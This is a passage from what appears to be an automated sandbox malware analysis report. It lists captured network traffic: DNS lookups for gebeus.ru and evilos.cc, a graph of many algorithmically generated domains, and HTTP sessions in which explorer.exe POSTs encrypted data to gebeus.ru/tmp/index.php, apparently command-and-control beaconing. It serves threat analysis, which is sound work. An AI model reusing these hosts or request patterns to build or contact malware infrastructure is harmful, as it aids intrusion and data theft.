                                                          Jul 19, 2024 13:47:00.979218006 CEST57892443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:00.979264021 CEST44357892167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:00.979505062 CEST57892443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:00.979916096 CEST57892443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:00.979939938 CEST44357892167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:01.653193951 CEST44357892167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:01.653439045 CEST57892443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:01.655898094 CEST57892443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:01.655915022 CEST44357892167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:01.656025887 CEST57892443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:01.656039000 CEST44357892167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:01.656234026 CEST44357892167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:01.656456947 CEST57892443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:01.700490952 CEST44357892167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:02.707312107 CEST44357892167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:02.707397938 CEST44357892167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:02.707458973 CEST57892443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:02.725076914 CEST57892443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:02.725122929 CEST44357892167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:02.725142956 CEST57892443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:02.725153923 CEST44357892167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:02.838440895 CEST57893443192.168.2.5107.173.160.137
                                                          Jul 19, 2024 13:47:02.838479996 CEST44357893107.173.160.137192.168.2.5
                                                          Jul 19, 2024 13:47:02.838557005 CEST57893443192.168.2.5107.173.160.137
                                                          Jul 19, 2024 13:47:02.839162111 CEST57893443192.168.2.5107.173.160.137
                                                          Jul 19, 2024 13:47:02.839175940 CEST44357893107.173.160.137192.168.2.5
                                                          Jul 19, 2024 13:47:03.339195967 CEST5789480192.168.2.558.151.148.90
                                                          Jul 19, 2024 13:47:03.344114065 CEST805789458.151.148.90192.168.2.5
                                                          Jul 19, 2024 13:47:03.344209909 CEST5789480192.168.2.558.151.148.90
                                                          Jul 19, 2024 13:47:03.344377041 CEST5789480192.168.2.558.151.148.90
                                                          Jul 19, 2024 13:47:03.344409943 CEST5789480192.168.2.558.151.148.90
                                                          Jul 19, 2024 13:47:03.349107027 CEST805789458.151.148.90192.168.2.5
                                                          Jul 19, 2024 13:47:03.349159956 CEST805789458.151.148.90192.168.2.5
                                                          Jul 19, 2024 13:47:03.452342033 CEST44357893107.173.160.137192.168.2.5
                                                          Jul 19, 2024 13:47:03.452477932 CEST57893443192.168.2.5107.173.160.137
                                                          Jul 19, 2024 13:47:03.454924107 CEST57893443192.168.2.5107.173.160.137
                                                          Jul 19, 2024 13:47:03.454931021 CEST44357893107.173.160.137192.168.2.5
                                                          Jul 19, 2024 13:47:03.454997063 CEST57893443192.168.2.5107.173.160.137
                                                          Jul 19, 2024 13:47:03.455003023 CEST44357893107.173.160.137192.168.2.5
                                                          Jul 19, 2024 13:47:03.455044985 CEST57893443192.168.2.5107.173.160.137
                                                          Jul 19, 2024 13:47:03.455049038 CEST44357893107.173.160.137192.168.2.5
                                                          Jul 19, 2024 13:47:03.455230951 CEST44357893107.173.160.137192.168.2.5
                                                          Jul 19, 2024 13:47:03.455343008 CEST57893443192.168.2.5107.173.160.137
                                                          Jul 19, 2024 13:47:03.500488997 CEST44357893107.173.160.137192.168.2.5
                                                          Jul 19, 2024 13:47:04.839235067 CEST44357893107.173.160.137192.168.2.5
                                                          Jul 19, 2024 13:47:04.839324951 CEST44357893107.173.160.137192.168.2.5
                                                          Jul 19, 2024 13:47:04.839396954 CEST57893443192.168.2.5107.173.160.137
                                                          Jul 19, 2024 13:47:04.855375051 CEST57893443192.168.2.5107.173.160.137
                                                          Jul 19, 2024 13:47:04.855416059 CEST44357893107.173.160.137192.168.2.5
                                                          Jul 19, 2024 13:47:04.855442047 CEST57893443192.168.2.5107.173.160.137
                                                          Jul 19, 2024 13:47:04.855457067 CEST44357893107.173.160.137192.168.2.5
                                                          Jul 19, 2024 13:47:04.870244026 CEST805789458.151.148.90192.168.2.5
                                                          Jul 19, 2024 13:47:04.870376110 CEST805789458.151.148.90192.168.2.5
                                                          Jul 19, 2024 13:47:04.870439053 CEST5789480192.168.2.558.151.148.90
                                                          Jul 19, 2024 13:47:04.870477915 CEST5789480192.168.2.558.151.148.90
                                                          Jul 19, 2024 13:47:04.875399113 CEST805789458.151.148.90192.168.2.5
                                                          Jul 19, 2024 13:47:04.963635921 CEST57895443192.168.2.5107.173.160.139
                                                          Jul 19, 2024 13:47:04.963664055 CEST44357895107.173.160.139192.168.2.5
                                                          Jul 19, 2024 13:47:04.963717937 CEST57895443192.168.2.5107.173.160.139
                                                          Jul 19, 2024 13:47:04.964138031 CEST57895443192.168.2.5107.173.160.139
                                                          Jul 19, 2024 13:47:04.964149952 CEST44357895107.173.160.139192.168.2.5
                                                          Jul 19, 2024 13:47:05.572654009 CEST44357895107.173.160.139192.168.2.5
                                                          Jul 19, 2024 13:47:05.572750092 CEST57895443192.168.2.5107.173.160.139
                                                          Jul 19, 2024 13:47:05.575510979 CEST57895443192.168.2.5107.173.160.139
                                                          Jul 19, 2024 13:47:05.575540066 CEST44357895107.173.160.139192.168.2.5
                                                          Jul 19, 2024 13:47:05.575612068 CEST57895443192.168.2.5107.173.160.139
                                                          Jul 19, 2024 13:47:05.575625896 CEST44357895107.173.160.139192.168.2.5
                                                          Jul 19, 2024 13:47:05.575814962 CEST44357895107.173.160.139192.168.2.5
                                                          Jul 19, 2024 13:47:05.575968027 CEST57895443192.168.2.5107.173.160.139
                                                          Jul 19, 2024 13:47:05.620502949 CEST44357895107.173.160.139192.168.2.5
                                                          Jul 19, 2024 13:47:06.931117058 CEST44357895107.173.160.139192.168.2.5
                                                          Jul 19, 2024 13:47:06.931226969 CEST44357895107.173.160.139192.168.2.5
                                                          Jul 19, 2024 13:47:06.931301117 CEST57895443192.168.2.5107.173.160.139
                                                          Jul 19, 2024 13:47:06.949461937 CEST57895443192.168.2.5107.173.160.139
                                                          Jul 19, 2024 13:47:06.949486017 CEST44357895107.173.160.139192.168.2.5
                                                          Jul 19, 2024 13:47:06.949529886 CEST57895443192.168.2.5107.173.160.139
                                                          Jul 19, 2024 13:47:06.949536085 CEST44357895107.173.160.139192.168.2.5
                                                          Jul 19, 2024 13:47:07.057446957 CEST57896443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:07.057483912 CEST44357896167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:07.057554960 CEST57896443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:07.059104919 CEST57896443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:07.059120893 CEST44357896167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:07.727298975 CEST44357896167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:07.727394104 CEST57896443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:07.739366055 CEST57896443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:07.739382982 CEST44357896167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:07.739511013 CEST57896443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:07.739516020 CEST44357896167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:07.739593029 CEST57896443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:07.739598036 CEST44357896167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:07.739686012 CEST44357896167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:07.739953995 CEST57896443192.168.2.5167.235.128.153
                                                          Jul 19, 2024 13:47:07.739969015 CEST44357896167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:08.622154951 CEST44357896167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:08.622236967 CEST44357896167.235.128.153192.168.2.5
                                                          Jul 19, 2024 13:47:08.622288942 CEST57896443192.168.2.5167.235.128.153

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jul 19, 2024 13:43:25.977535009 CEST6316753192.168.2.51.1.1.1
                                                          Jul 19, 2024 13:43:26.464312077 CEST53631671.1.1.1192.168.2.5
                                                          Jul 19, 2024 13:43:28.497473001 CEST6280553192.168.2.51.1.1.1
                                                          Jul 19, 2024 13:43:28.984970093 CEST53628051.1.1.1192.168.2.5
                                                          Jul 19, 2024 13:43:45.971070051 CEST5351532162.159.36.2192.168.2.5
                                                          Jul 19, 2024 13:43:46.509813070 CEST53619301.1.1.1192.168.2.5
                                                          Jul 19, 2024 13:46:03.048774958 CEST5144753192.168.2.51.1.1.1
                                                          Jul 19, 2024 13:46:03.459285021 CEST53514471.1.1.1192.168.2.5

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jul 19, 2024 13:43:25.977535009 CEST192.168.2.51.1.1.10x22b0Standard query (0)evilos.ccA (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:43:28.497473001 CEST192.168.2.51.1.1.10x5bc2Standard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:46:03.048774958 CEST192.168.2.51.1.1.10x5390Standard query (0)gebeus.ruA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jul 19, 2024 13:43:26.464312077 CEST1.1.1.1192.168.2.50x22b0No error (0)evilos.cc127.0.0.127A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:43:28.984970093 CEST1.1.1.1192.168.2.50x5bc2No error (0)gebeus.ru186.145.236.93A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:43:28.984970093 CEST1.1.1.1192.168.2.50x5bc2No error (0)gebeus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:43:28.984970093 CEST1.1.1.1192.168.2.50x5bc2No error (0)gebeus.ru201.191.99.134A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:43:28.984970093 CEST1.1.1.1192.168.2.50x5bc2No error (0)gebeus.ru63.143.98.185A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:43:28.984970093 CEST1.1.1.1192.168.2.50x5bc2No error (0)gebeus.ru185.65.254.149A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:43:28.984970093 CEST1.1.1.1192.168.2.50x5bc2No error (0)gebeus.ru187.211.163.180A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:43:28.984970093 CEST1.1.1.1192.168.2.50x5bc2No error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:43:28.984970093 CEST1.1.1.1192.168.2.50x5bc2No error (0)gebeus.ru201.119.88.129A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:43:28.984970093 CEST1.1.1.1192.168.2.50x5bc2No error (0)gebeus.ru187.131.250.134A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:43:28.984970093 CEST1.1.1.1192.168.2.50x5bc2No error (0)gebeus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:46:03.459285021 CEST1.1.1.1192.168.2.50x5390No error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:46:03.459285021 CEST1.1.1.1192.168.2.50x5390No error (0)gebeus.ru201.119.88.129A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:46:03.459285021 CEST1.1.1.1192.168.2.50x5390No error (0)gebeus.ru187.131.250.134A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:46:03.459285021 CEST1.1.1.1192.168.2.50x5390No error (0)gebeus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:46:03.459285021 CEST1.1.1.1192.168.2.50x5390No error (0)gebeus.ru186.145.236.93A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:46:03.459285021 CEST1.1.1.1192.168.2.50x5390No error (0)gebeus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:46:03.459285021 CEST1.1.1.1192.168.2.50x5390No error (0)gebeus.ru201.191.99.134A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:46:03.459285021 CEST1.1.1.1192.168.2.50x5390No error (0)gebeus.ru63.143.98.185A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:46:03.459285021 CEST1.1.1.1192.168.2.50x5390No error (0)gebeus.ru185.65.254.149A (IP address)IN (0x0001)false
                                                          Jul 19, 2024 13:46:03.459285021 CEST1.1.1.1192.168.2.50x5390No error (0)gebeus.ru187.211.163.180A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • 167.235.128.153
                                                          • 107.173.160.137
                                                          • 107.173.160.139
                                                          • otvdelfrveshsj.org
                                                            • gebeus.ru
                                                          • gertosepucdr.net
                                                          • auihegamujgli.org
                                                          • pjxtqtcjxrgf.org
                                                          • kohgiaokgvetlns.org
                                                          • bfhspraqocnicu.com
                                                          • ovmeaseeesddavq.com
                                                          • hgoopfcuaxxcsy.org
                                                          • obswclybvegixrj.com
                                                          • 77.221.157.163
                                                          • dxxpyoqdjpxpiu.org
                                                          • iokxfgvwlwvbn.org
                                                          • tdhyqfiiuytxgxp.net
                                                          • pojiqquohhri.net
                                                          • vowgfyyfrgsdo.org
                                                          • prmalwoksspqb.org
                                                          • 64.190.113.113
                                                          • jvyahgkmsjudiynh.com
                                                          • xdpeqpsppgevmdmy.net
                                                          • fspagvqqxpvnoc.net
                                                          • bisribucgcplqa.com
                                                          • cuacgvevesxxi.org
                                                          • ytbwubxpmuvtgbr.net
                                                          • sflpljrbacyl.org
                                                          • eiyfgialotb.net
                                                          • tcaoqcerkkqpxcv.net
                                                          • cgqjakxfbvjd.com
                                                          • acdyanixqocc.com
                                                          • sphopwrqrdvrdc.com
                                                          • rbvhstcjoya.com
                                                          • gverqeqrcdjfj.net
                                                          • wewwkflbpaqtq.net
                                                          • tdqulnerhstaff.org
                                                          • ddcrjixvnjlweis.org
                                                          • gdughyktsbt.org
                                                          • psbkmfijtgxs.com
                                                          • ycxtgfaggjcyqor.com
                                                          • ogexqdmlxvkrb.net
                                                          • gfjdcfmhxmbvhdj.net

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549710186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:43:28.991746902 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://otvdelfrveshsj.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 211
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:43:28.991786003 CEST211OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 44 55 de 97
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vuDUECF4raeVX<C|fPX~=[jPOGK|K'#_-r
                                                          Jul 19, 2024 13:43:30.046596050 CEST152INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:43:29 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 04 00 00 00 72 e8 85 ea
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.549711186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:43:30.060446978 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://gertosepucdr.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 241
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:43:30.060514927 CEST241OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 64 2a a2 ba
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vud*Mph>I/pU@-}V\7&aY[B5BW7{3_rTdbU?Nd(pa7'7fVaz
                                                          Jul 19, 2024 13:43:31.124438047 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:43:30 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.549712186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:43:31.135934114 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://auihegamujgli.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 294
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:43:31.135957956 CEST294OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 20 53 d6 94
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vu S/zqhKYJ.+H!C,ER0ehOCDJ-n }1-cDQ2~!83R5`AmC
                                                          Jul 19, 2024 13:43:32.195909023 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:43:32 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.549713186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:43:32.217031956 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://pjxtqtcjxrgf.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 223
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:43:32.217057943 CEST223OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 4d 1d e3 fb
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vuMg7a"N6 )~q[JC%z~)-D=]06"=5]le,A+6#}
                                                          Jul 19, 2024 13:43:33.257466078 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:43:33 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.549714186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:43:33.267873049 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://kohgiaokgvetlns.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 309
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:43:33.267941952 CEST309OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 29 46 d9 a1
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vu)Fc]@p]%TPT!kn%d*^(]]j1R6E(f"fe3cZpnDVC;|P=w\y,1"
                                                          Jul 19, 2024 13:43:34.341280937 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:43:34 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
